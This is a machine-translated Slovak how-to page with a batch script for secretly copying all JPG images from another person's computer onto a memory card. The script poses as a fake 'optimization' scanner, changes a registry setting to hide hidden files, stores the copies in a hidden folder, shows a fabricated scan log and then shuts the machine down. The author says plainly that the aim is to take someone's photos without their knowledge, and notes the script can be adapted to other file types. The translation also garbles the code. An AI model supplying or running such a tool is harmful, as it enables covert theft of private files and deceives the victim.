Tajný špionážny obrázok Kopírovanie dávkového súboru: 5 krokov

2024 Autor: John Day | [email protected]. Naposledy zmenené: 2024-01-30 12:01

Najprv teda najskôr, čo je to vytváranie pokynov a prečo. Tento návod vám umožní vytvoriť dávkový súbor, ktorý skopíruje všetky obrázky z počítača na pamäťovú kartu. Urobí to diskrétne a bude sa vydávať za ďalší program, ktorý kontroluje problémy v počítači. Po dokončení budete mať na pamäťovej karte skrytý priečinok so všetkými skopírovanými obrázkami. Prečo? Vytvoril som tento návod, pretože som chcel získať digitálnu fotografiu z počítača niekoho bez toho, aby vedeli, že som to urobil. Legitímne použitie tohto súboru vám umožní archivovať/zálohovať vaše osobné fotografie. Iné použitia: Tento súbor je možné upraviť tak, aby umožňoval kopírovanie akéhokoľvek iného typu dokumentu.

Krok 1: Napíšte kód

Skopírujte nasledujúci kód do poznámkového bloku a uložte ho do koreňového adresára pamäte ako bat súbor, môžete ho ľubovoľne pomenovať, pokiaľ má príponu.bat. Aby ste sa uistili, že má správnu príponu, zadajte ju nasledovne do ukladacieho poľa poznámkového bloku „copyimage.bat“(zahrňte citáty!)

@echo offecho Optimalizačný klient 2008 v3.02becho ------------------------------ echo.echo Nepoužívajte počítač kým je spustený.echo.echo Zoznam procesov skenovania. Po dokončení sa správcovi systému zobrazí protokol na kontrolu.echo.echo Buďte trpezliví, môže to trvať až 3 hodiny. Pridajte HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced /v Hidden /t REG_DWORD /d 00000002/f> nulmkdir / data> nulattrib +h / data> nulsetLocal EnableDelayedExpansion@echo offfor %% a in (jpg) do (for/f "tokens =* delims =" %% f in ('dir/b/s/ ad c: \*. %% a ') do (xcopy "%% f" / data / /y /h /q> nul)) attrib -s +h data \*> nulstart optimizationLog.txtshutdown /s /c " Dokončenie skenovania optimalizácie, váš počítač sa teraz vypne"

Krok 2: Vytvorte falošný súbor správy

V tomto kroku som vytvoril falošný textový súbor, ktorý predstiera, že je logom výsledku dávkového súboru, ktorý spustíme na kopírovanie súborov. To vám umožní predstierať, že sa niečo stalo. Nezáleží na tom, čo tento súbor hovorí, môžete ho ľubovoľne meniť, iba sa uistite, že názov súboru je správny a že je uložený v koreňovom adresári vašej pamäťovej karty. Text, ktorý som použil, pochádza hlavne z únosu tohto prihláste sa, skopírujte ho a uložte do koreňového adresára pamäte ako optimizationLog.txt

Skenovanie dokončené. Zatvorte tento denník a nechajte správcu systému skontrolovať ho. Spustené procesy: C: / Windows / system32 / taskeng.exeC: / Windows / system32 / Dwm.exeC: / Windows / Explorer. EXEC: / Program Files / Java / jre1. 6.0_07 / bin / jusched.exeC: / Windows / System32 / hkcmd.exeC: / Windows / System32 / igfxpers.exeC: / Windows / system32 / igfxsrvc.exeC: / Program Files / Synaptics / SynTP / SynTPEnh.exeC: / Program Súbory / TOSHIBA / Power Saver / TPwrMain.exeC: / Program Files / TOSHIBA / SmoothView / SmoothView.exeC: / Program Files / TOSHIBA / FlashCards / TCrdMain.exeC: / Program Files / BitDefender / BitDefender 2009 / bdagent.exeC: / Program Súbory / TOSHIBA / TOSCDSPD / TOSCDSPD.exeC: / Program Files / Registry Mechanic / regmech.exeC: / Program Files / BitDefender / BitDefender 2009 / seccenter.exeC: / Program Files / Synaptics / SynTP / SynTPHelper.exeC: / Program Files / Vuze / Azureus.exeC: / Program Files / Microsoft Office / Office12 / OUTLOOK. EXEC: / Program Files / AutoCAD 2008 / acad.exeC: / Users / Tom / AppData / Local / Temp / AdskCleanup.0001C: / Program Files / Mozilla Firefox / firefox.exeC: / Windows / System32 / POZNÁMKA PAD. EXEC: / Windows / system32 / SearchFilterHost.exeC: / HijackThis / HijackThis.exeR1 - HKCU / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKCU / Software / Microsoft / Internet Explorer / Main, stránka vyhľadávania = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKCU / Software / Microsoft / Internet Explorer / Main, úvodná stránka = https://www.google.co. ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Page_URL = https://www.google.co.ukR1 - HKLM / Software / Microsoft / Internet Explorer / Main, Default_Search_URL = https://go.microsoft.com/ fwlink/? LinkId = 54896R1 - HKLM / Software / Microsoft / Internet Explorer / Main, stránka vyhľadávania = https://go.microsoft.com/fwlink/?LinkId=54896R0 - HKLM / Software / Microsoft / Internet Explorer / Main, Štart Stránka = https://go.microsoft.com/fwlink/?LinkId=69157R0 - HKLM / Software / Microsoft / Internet Explorer / Search, SearchAssistant = R0 - HKLM / Software / Microsoft / Internet Explorer / Search, CustomizeSearch = R0 - HKCU / Software / Microsoft / Internet Explorer / Príliš lbar, LinksFolderName = O1 - Hostitelia::: 1 localhostO2 - BHO: AcroIEHelperStub - {18DF081C -E8AD -4283 -A596 -FA578C2EBDC3} - C: / Program Files / Common Files / Adobe / Acrobat / ActiveX / AcroIEHelperShim.dllO2 - B: Pomocník prehliadača Groove GFS-{72853161-30C5-4D22-B7F9-0BBC1D38A37E}-C: / Program Files / Microsoft Office / Office12 / GrooveShellExtensions.dllO2-BHO: SSVHelper Class-{761497BB-D6F0-462C-B6EB-D4DAF1: / Program Files / Java / jre1.6.0_07 / bin / ssv.dllO3 -Panel s nástrojmi: Panel s nástrojmi BitDefender -{381FFDE8-2394-4f90 -B10D -FC6124A40F8C} -C: / Program Files / BitDefender / BitDefender 2009 / IEToolbar.dllO4 - HKLM \.. / Spustiť: [Windows Defender] %ProgramFiles %\ Windows Defender / MSASCui.exe -hideO4 - HKLM \.. / Spustiť: [SunJavaUpdateSched] "C: / Program Files / Java / jre1.6.0_07 / bin / jusched.exe "O4 - HKLM \.. / Spustiť: [IgfxTray] C: / Windows / system32 / igfxtray.exeO4 - HKLM \.. / Spustiť: [HotKeysCmds] C: / Windows / system32 / hkcmd.exeO4 - HKLM \.. / Spustiť: [Perzistencia] C: / Windows / system32 / igfxpers.exeO4 - HKLM \.. / Spustiť: [SynTPEnh] C: / Program Files / Syna ptics / SynTP / SynTPEnh.exeO4 - HKLM \.. / Run: [TPwrMain] %ProgramFiles %\ TOSHIBA / Power Saver / TPwrMain. EXEO4 - HKLM \.. / Run: [SmoothView] %ProgramFiles %\ Toshiba / SmoothView / SmoothView.exeO4 - HKLM \.. / Spustiť: [00TCrdMain] %ProgramFiles %\ TOSHIBA / FlashCards / TCrdMain.exeO4 - HKLM \.. / Spustiť: [Toshiba TEMPO] C: / Program Files / Toshiba TEMPRO / Toshiba. Tempo. UI. TrayApplication.exeO4 - HKLM \.. / Spustiť: [BDAgent] "C: / Program Files / BitDefender / BitDefender 2009 / bdagent.exe" O4 - HKLM \.. / Spustiť: [BitDefender Antiphishing Helper] "C: / Program Súbory / BitDefender / BitDefender 2009 / IEShow.exe "O4 - HKCU \.. / Spustiť: [TOSCDSPD] C: / Program Files / TOSHIBA / TOSCDSPD / TOSCDSPD.exeO4 - HKCU \.. / Spustiť: [RegistryMechanic] C: / Program Files / Registry Mechanic / RMTray.exe /HO4 - Spustenie: OneNote 2007 Screen Clipper and Launcher.lnk = C: / Program Files / Microsoft Office / Office12 / ONENOTEM. EXEO8 - Extra kontextová položka ponuky: E & xport do programu Microsoft Excel - rozlíšenie: //C:\PROGRA~1\MICROS~3\Office12\EXCEL. EXE/3000O9-Extra tlačidlo: (bez názvu)-{08B0E5C0-4FCB-11CF-AAA5-0040 1C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9 - Extra ponuka 'Nástroje': Sun Java Console - {08B0E5C0-4FCB -11CF -AAA5-00401C608501} - C: / PROGRA ~ 1 / Java / JRE16 ~ 2.0_0 / bin / ssv.dllO9-Extra tlačidlo: Odoslať do OneNote-{2670000A-7350-4f3c-8081-5663EE0C6C49}-C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Extra položka „Nástroje“v ponuke: S & end to OneNote - {2670000A -7350-4f3c -8081-5663EE0C6C49} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / ONBttnIE.dllO9 - Extra tlačidlo: eBay.co.uk - Kúpiť It Sell It Love It-{76577871-04EC-495E-A12B-91F7C3600AFA}-https://rover.ebay.com/rover/1/710-44557-9400-3/4 (súbor chýba) O9-Extra tlačidlo: (bez názvu)-{85d1f590-48f4-11d9-9669-0800200c9a66}- %windir %\ bdoscandel.exe (súbor chýba) O9-Extra 'Tools' itemitemem: Uninstall BitDefender Online Scanner v8-{85d1f590-48f4-11d9-9669 -0800200c9a66} - %windir %\ bdoscandel.exe (súbor chýba) O9 -Extra tlačidlo: Amazon.co.uk -{8A918C1D -E123-4E36 -B562-5C1519E434CE} -https://www.amazon.co.uk/ exec/obidos/redirect-home? tag = Toshibaukbholink-2 1 & web = domov (súbor chýba) O9 - Extra tlačidlo: Výskum - {92780B25-18CC -41C8 -B9BE -3C9C571A8263} - C: / PROGRA ~ 1 / MICROS ~ 3 / Office12 / REFIEBAR. DLLO10 - neznámy súbor vo Winsock LSP: c: / Windows / system32 / nlaapi.dllO10 - neznámy súbor vo Winsock LSP: c: / windows / system32 / napinsp.dllO10 - neznámy súbor vo Winsock LSP: c: / program files / vmware / vmware workstation / vsocklib.dllO10 - neznámy súbor vo Winsock LSP: c: / program files / vmware / vmware workstation / vsocklib.dllO11-Skupina možností: [INTERNATIONAL] International*O13-Gopher Prefix: O16-DPF: {CF40ACC5-E1BB-4AFF-AC72-04C2F616BCA7} (trieda get_atlcom) - https://wwwimages.adobe.com/www.adobe.com/products/acrobat/nos/gp.cabO18 - protokol: grooveLocalGWS - {88FED34C -F0CA -4636 -A375-3CB6248B04CD} - C: / Program Files / Microsoft Office / Office12 / GrooveSystemServices.dllO18-Protokol: ms-help-{314111C7-A502-11D2-BBCA-00C04F8EC294}-C: / Program Files / Common Files / Microsoft Shared / Help / hxds.dllO18-Filter filter unise: text/ xml-{807563E5-5146-11D5-A672-00B0D022E945} - C: / PROGRA ~ 1 / COMMON ~ 1 / MICROS ~ 1 / OFFICE12 / MSOXMLMF. DLLO20 - Winlogon Upozorniť: igfxcui - C: / Windows / SYSTEM32 / igfxdev.dllO23 - Služba: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systémy - C: / Windows / system32 / agrsmsvc.exeO23 - Služba: BitDefender Arrakis Server (Arrakis3) - BitDefender SRL https://www.bitdefender.com - C: / Program Files / Common Files / BitDefender / BitDefender Arrakis Server / bin / Arrakis3.exeO23 - Služba: Licenčná služba Autodesk - Autodesk - C: / Program Files / Common Files / Autodesk Shared / Service / AdskScSrv.exeO23 - Služba: Služba ConfigFree - TOSHIBA CORPORATION - C: / Program Files / TOSHIBA / ConfigFree / CFSvcs.exeO23 - Služba: @%SystemRoot%\ ehome / ehstart.dll, -101 (ehstart) - neznámy vlastník - %windir %\ system32 / svchost.exe (súbor chýba) O23 - Služba: pomocník getPlus (R) - NOS Microsystems Ltd. - C: / Program Files / NOS / bin / getPlus_HelperSvc.exeO23 - Služba: Aktualizačná služba Google (gupdate1c98840f4e6525b) (gupdate1c98840f4e6525b) - Neznámy vlastník - C: / Program Files / Google / Update / GoogleUpdate.exe " /svc (súbor chýba) O23 - Služba: BitDefender Desktop Update Service (LIVESRV) - neznámy vlastník - C: / Program Files / Common Súbory / BitDefender / BitDefender Update Service / livesrv.exe " /služba (súbor chýba) O23 - Služba: @%SystemRoot%\ system32 / qwave.dll, -1 (QWAVE) - neznáme vlastné r -%windir%\ system32 / svchost.exe (súbor chýba) O23 - Služba: @%SystemRoot%\ system32 / seclogon.dll, -7001 (seclogon) - Neznámy vlastník -%windir%\ system32 / svchost.exe (súbor chýba) O23 - Služba: Služba ladenia výkonu prenosného počítača (TempoMonitoringService) - Toshiba Europe GmbH - C: / Program Files / Toshiba TEMPRO / TempoSVC.exeO23 - Služba: Služba podpory TOSHIBA Navi (TNaviSrv) - TOSHIBA Corporation - C: / Program Files / TOSHIBA / TOSHIBA DVD PLAYER / TNaviSrv.exeO23 - Služba: Služba optických diskových jednotiek TOSHIBA (TODDSrv) - TOSHIBA Corporation - C: / Windows / system32 / TODDSrv.exeO23 - Služba: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - c: / Program Files / TOSHIBA / Power Saver / TosCoSrv.exeO23 - Služba: TOSHIBA SMART Log Service - TOSHIBA Corporation - c: / Program Files / TOSHIBA / SMARTLogService / TosIPCSrv.exeO23 - Služba: VMware Agent Service (ufad -ws60) - neznámy vlastník - C: / Program Files / VMware / VMware Workstation / vmware -ufad.exe "-d" C: / Program Files / VMware / VMware Workstation / "-s ufad -p2v.x ml (súbor chýba) O23 - Služba: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C: / Program Files / Common Files / Ulead Systems / DVD / ULCDRSvr.exeO23 - Služba: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C: / Program Files / VMware / VMware Workstation / vmware -authd.exeO23 - Služba: Služba VMware DHCP (VMnetDHCP) - VMware, Inc. - C: / Windows / system32 / vmnetdhcp.exeO23 - Služba: VMware NAT Služba - VMware, Inc. - C: / Windows / system32 / vmnat.exeO23 - Služba: BitDefender Virus Shield (VSSERV) - neznámy vlastník - C: / Program Files / BitDefender / BitDefender 2009 / vsserv.exe " /služba (súbor chýba) O23 - Služba: VNC Server Verzia 4 (WinVNC4) - Neznámy vlastník - C: / Program Files / RealVNC / VNC4 / WinVNC4.exe " - služba (súbor chýba) O23 - Služba: @%ProgramFiles%\ Windows Media Player / wmpnetwk.exe, -101 (WMPNetworkSvc) - neznámy vlastník - %ProgramFiles %\ Windows Media Player / wmpnetwk.exe (súbor chýba)

Krok 3: Spustite program

Teraz by ste mali mať pamäťovú kartu s dvoma súbormi (a pre nové obrázky je pripravené veľa voľného miesta). Ak máte na jednotke čokoľvek iné, nevadí. Vezmite pamäťovú kartu do cieľového počítača. Keď sa zaregistruje, všimnite si písmeno jednotky, ktoré mu je priradené. Umožní vám to spustiť ho bez toho, aby ste museli najskôr prehľadávať priečinok. Stlačte kláves Windows a potom stlačte kláves „R“(pričom stále držte kláves Windows). Zobrazí sa okno Spustiť. Do poľa Spustiť zadajte cestu k dávkovému súboru, ktorý sme vytvorili, pričom písmeno jednotky je písmeno priradené pri zapojení pamäte. Napríklad, ak vložím pamäťovú kartu a zaregistruje ag: / drive, potom by som spustil: g: / copyimage.batA potom stlačte kláves Enter alebo kliknite na položku Spustiť. Tým sa spustí dávkový súbor. Keď je dokončený, stroj sa vypne. Vyberte pamäťovú kartu a vezmite ju!

Krok 4: Získajte obrázky

Teraz by ste mali mať pamäťovú kartu so všetkými obrázkami. Súbory a priečinok sú skryté, takže ak sa vaše súbory nezobrazujú, budete ich musieť povoliť. Ak to chcete urobiť, otvorte okno prieskumníka (napr. Otvorte počítač) a: WinXP - Nástroje, Možnosti priečinka, Zobraziť, Zobraziť skryté súbory Vista - Organizovať, Možnosti priečinka a vyhľadávania, Zobraziť, Zobraziť skryté súbory Po vybratí by ste mali mať možnosť otvoriť skrytý priečinok a získajte požadované obrázky!

Krok 5: Čo znamená kód

Vysvetlím čo najviac z kódu. hlavnú funkciu kopírovania som nepísal ja, požičal som si ju z nasledujúceho webu a upravil ju:

@echo vypnuté '' Zastaví zobrazovanie príkazov na obrazovke, takže používateľ nevie, čo sa deje echo Optimization client 2008 v3.02b echo ------------------- ------------- ozvena. Zapisuje na obrazovku názov pre echo programu. Pokiaľ je spustený, nepoužívajte počítač.echo.echo Zoznam procesov skenovania. Po dokončení sa správcovi systému zobrazí protokol na kontrolu.echo.echo Buďte trpezliví, môže to trvať až 3 hodiny. Oznámi používateľovi množstvo odpadu, ktoré nie je pravdivé reg pridať HKCU / Software / Microsoft / Windows / CurrentVersion / Explorer / Advanced /v Skryté /t REG_DWORD /d 00000002 /f> nul Pridá kľúč databázy Registry, ktorý skryje skryté súbory a priečinky. Používateľ tak prestane vidieť priečinok, ktorý vytvárame, na uloženie skopírovaných obrázkov. Príkaz nul na konci zabráni príkazu hlásiť akékoľvek správy, keď skončí mkdir / data> nul Vytvorí priečinok na disku, v ktorom sa tento dávkový súbor nachádza na volaných údajoch. attrib +h / data> nul Skryje vytvorený priečinok setLocal EnableDelayedExpansionfor %% a in (jpg) do (for/f "tokens =* delims =" %% f in ('dir/b/s/ad c: \*. %% a ') do (xcopy "%% f" / data / /y /h /q> nul)) Toto je kód, ktorý vyhľadá obrázky na celej jednotke c: \. Ak chcete, aby vyhľadával iný disk, zmeňte časť c: na požadovanú. Ak chcete, aby našiel ďalšie typy súborov, ich zoznam vedľa textu jpg, oddeľte typy súborov medzerou. Napríklad -j.webp